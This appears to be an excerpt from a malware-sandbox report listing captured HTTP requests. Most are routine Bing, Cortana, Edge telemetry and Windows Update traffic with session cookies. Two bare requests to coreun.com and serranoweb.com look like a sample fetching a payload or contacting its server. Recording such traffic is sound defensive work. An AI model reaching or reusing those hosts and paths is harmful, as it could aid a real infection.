Source: global traffic	HTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdUM5grmCuYK5grmCuYK5grmCg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?440af75ec5328aeb478a619fcf35d4ae HTTP/1.1host: ax-ring-fallback.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?468bd65c9b68ce0d8a81244f984382ee HTTP/1.1host: ax-ring-fallback.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/CRJMH8ar3a3tHOTBEOmE9-4tZPg.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=3e0697b7231908f88074365a9ce29069&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1},{%22RequestID%22:%22ax-ring-fallback.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:732,%22T%22:1},{%22RequestID%22:%22ax-ring-fallback.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:139,%22T%22:1},{%22RequestID%22:%22t-ring-fallback.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:569,%22T%22:1},{%22RequestID%22:%22t-ring-fallback.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:139,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/DtBjRbkLzLMq5p7jmRn2HOq1lgI.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /event/addv3 HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /abtest/convertedv3 HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cFRVyAoUYR539b5&MD=DvvTFl6k HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /wp-content/d5 HTTP/1.1Host: coreun.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /42/504.txt HTTP/1.1Host: www.serranoweb.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rp/LLlskWvUCMmHCLUYuz8vSh87t6Y.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/LP9hwiqJSIzTqMBfw7Kzjq3wC9A.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Nc4fY9Bt2xiN12EeZpnY5mhtaHc.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/OUJ6ahKp8erGgr7fmZPGFt5iOeQ.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Q0J3WqtOxBbLnp5iTXu__jsZq6o.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Q_a1-NQcI9jzDQWCGyf-VjN20v4.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/S-1Sin9hxjW1LkijyZiLBA_FHdk.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/XUoKWXdZQS2iuOnv0a_-gwXn0RY.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/ZGYsYc-4cfWAUrRQfDPHboO8Xgc.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/dXH4UJXiG6BhYx2KONGGI7yr8wE.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
